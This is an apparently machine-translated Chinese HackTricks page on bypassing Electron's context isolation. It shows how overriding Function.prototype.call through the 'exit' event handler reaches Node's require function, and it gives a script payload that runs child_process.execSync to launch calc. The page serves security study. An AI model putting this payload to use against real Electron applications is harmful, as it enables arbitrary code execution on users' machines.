最后更新于1年前
您在网络安全公司工作吗? 您想看到您的公司在HackTricks中做广告吗? 或者您想访问PEASS的最新版本或下载PDF格式的HackTricks吗? 请查看!
发现我们的独家收藏品
获取
加入 或 或在Twitter上关注我 🐦。
通过向和提交PR来分享您的黑客技巧。
来自
当页面加载开始时,"exit"事件侦听器总是由内部代码设置。 此事件在导航之前发出:
process.on('exit', function (){ for (let p in cachedArchives) { if (!hasProp.call(cachedArchives, p)) continue cachedArchives[p].destroy() } })
https://github.com/nodejs/node/blob/8a44289089a08b7b19fa3c4651b5f1f5d1edd71b/bin/events.js#L156-L231 -- 不再存在
然后跳到这里:
其中 "self" 是 Node 的 process 对象:
process 对象有一个指向 "require" 函数的引用:
process.mainModule.require
由于 handler.call 将接收 process 对象,我们可以覆盖它以执行任意代码:
<script> Function.prototype.call = function(process){ process.mainModule.require('child_process').execSync('calc'); } location.reload();//Trigger the "exit" event </script>
泄漏:
利用:
获取原型污染中的 require 对象。来自
您在网络安全公司工作吗? 想要看到您的公司在 HackTricks 中被宣传吗? 或者您想要访问PEASS 的最新版本或下载 HackTricks 的 PDF吗? 请查看!
探索,我们的独家收藏品
加入 或 或在 Twitter 上关注我 🐦。
通过向 和 提交 PR 来分享您的黑客技巧。
